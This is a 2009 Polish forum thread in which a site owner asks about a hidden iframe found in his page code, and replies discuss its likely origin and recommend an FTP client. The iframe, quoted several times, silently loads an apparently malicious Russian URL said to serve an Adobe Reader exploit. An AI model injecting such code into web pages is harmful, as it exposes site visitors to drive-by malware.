  • 1. Data: 2009-11-16 23:26:01
    Temat: Co to za cholerstwo?
    Od: "Maveriq" <suckMYrocket!!!@gmail.com>

    <iframe frameborder="0" onload="if (!this.src){ this.height='0';
    this.src='http://worldcardtech.ru:8080/index.php'; this.width='0';}"
    >1258370281co3</iframe>

    Pozdrawiam, M.

  • 2. Data: 2009-11-17 00:50:45
    Temat: Re: Co to za cholerstwo?
    Od: vcore <mail*wytnij*@vcore.pl>

    Maveriq pisze:
    > <iframe frameborder="0" onload="if (!this.src){ this.height='0';
    > this.src='http://worldcardtech.ru:8080/index.php'; this.width='0';}"

    Z tego co widze to exploit na starego Adobe Readera

    --
    WebProgress - Nowoczesne aplikacje internetowe

    www.webprogress.com.pl

  • 3. Data: 2009-11-17 01:08:36
    Od: "Maveriq" <suckMYrocket!!!@gmail.com>

    W jaki sposób coś takiego może pojawić sięw kodzie strony? Czynnik ludzki,
    czy raczej spam boty (dziury w zabezpieczeniach CMS, etc.)

    Pozdrawiam, M.

  • 4. Data: 2009-11-17 01:28:32
    Od: vcore <mail*wytnij*@vcore.pl>

    Maveriq pisze:
    > W jaki sposób coś takiego może pojawić sięw kodzie strony? Czynnik ludzki,
    > czy raczej spam boty (dziury w zabezpieczeniach CMS, etc.)
    >
    > Pozdrawiam, M.

    Zależy gdzie się to pojawiło, mógł to być bot który wyszukuje np. fora które
    umożliwiają pisanie
    postów w czystym HTML itd., bywa nawet tak że winny jest hosting, jeśli jest dziurawy
    to 'hakerzy'
    mogą dodać tego typu kod do każdej witryny która się na nim znajduje, tak jak to się
    dzieje w
    przypadku darmowych hostingów gdzie do każdej witryny doklejany jest kod zawierający
    reklamę

  • 5. Data: 2009-11-17 09:05:01
    Od: "monter.FM" <s...@m...fm>

    W dniu 2009-11-17 02:08, Maveriq pisze:
    > W jaki sposób coś takiego może pojawić sięw kodzie strony? Czynnik ludzki,
    > czy raczej spam boty (dziury w zabezpieczeniach CMS, etc.)

    Jak używasz Total Commandera, to trojan mógł wykraść hasła...

    --
    http://monter.FM
    Archiwum JW23, parodie, miksy muzyczne, polityczne, programowe...

  • 6. Data: 2009-11-17 11:29:32
    Od: Lelos <m...@w...pl>

    On 17 Lis, 00:26, "Maveriq" <s...@g...com> wrote:
    > <iframe frameborder="0" onload="if (!this.src){ this.height='0';
    > this.src='http://worldcardtech.ru:8080/index.php';th
    is.width='0';}"

    > Pozdrawiam, M.

    Szkoda że nie mogę tego zobaczyć:
    Nie odnaleziono serwera

  • 7. Data: 2009-11-17 13:34:27
    Od: "Maveriq" <suckMYrocket!!!@gmail.com>

    Skąd takie cholerstwo mogło się wziąć w kodzie wspomnianego już,
    nieszczęsnego jportalu (czynnik ludzki, czy raczej spam boty) i jaki to ma
    związek z Total Commanderem. jak dotąd myślałem, że to w miarę bezpieczny
    program. Jakiego zatem dobrego, uniwersalnego klienta FTP (najlepiej
    darmowego z menedżerem plików) możecie polecić?

    Pozdrawiam, M.

  • 8. Data: 2009-11-17 16:39:32
    Od: ethanak <s...@b...pl>

    Dnia Tue, 17 Nov 2009 14:34:27 +0100, Maveriq napisał(a):

    > Sk?d takie cholerstwo mog?o sie wzi?ae w kodzie wspomnianego ju?,
    > nieszczesnego jportalu (czynnik ludzki, czy raczej spam boty) i jaki to
    > ma zwi?zek z Total Commanderem.

    a) ustaw se kodowanie

    b) dziura w TC jest znana od baaaaaardzo dawna...

    > jak dot?d my?la?em, ?e to w miare
    > bezpieczny program.

    Nie, nie myślałeś. Wydawało Ci się.

    Konkretniej wydawało Ci sie że myślałeś.

    > Jakiego zatem dobrego, uniwersalnego klienta FTP
    > (najlepiej darmowego z mened?erem plików) mo?ecie poleciae?

    Pod windowsa? Nie wiem... używam po prostu ftp.

    ethanak
    --
    mailto=window.atob('ZXRoYW5ha0Bwb2xpcC5jb20=');
    http://milena.polip.com/ - nie czekam na Ivo!

  • 9. Data: 2009-11-17 16:50:47
    Od: Daniel Stalica <d...@s...info>

    Maveriq pisze:
> [...]
    > program. Jakiego zatem dobrego, uniwersalnego klienta FTP (najlepiej
    > darmowego z menedżerem plików) możecie polecić?

    np. Filezilla

    --
    Wkłady kominowe: http://twojkomin.pl

  • 10. Data: 2009-11-17 17:09:42